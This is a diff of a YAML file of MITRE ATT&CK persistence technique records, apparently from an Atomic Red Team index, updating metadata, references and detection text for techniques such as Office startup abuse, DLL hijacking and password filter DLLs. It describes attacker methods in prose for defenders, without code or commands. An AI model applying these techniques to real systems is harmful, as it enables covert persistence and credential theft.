+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -28872,79 +29253,73 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -28974,6 +29349,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -28984,6 +29360,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -28992,13 +29369,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -29040,9 +29417,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -29110,19 +29484,18 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -29138,8 +29511,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -29153,7 +29526,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -29179,6 +29552,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -29206,42 +29583,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -29256,13 +29602,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -29270,11 +29621,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests: []
   T1505.002:
@@ -29305,7 +29679,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -29343,13 +29717,11 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -29375,7 +29747,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -29417,7 +29789,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -29495,11 +29866,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29579,35 +29949,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -29631,71 +29976,60 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -29704,24 +30038,56 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests: []
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -29813,8 +30179,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
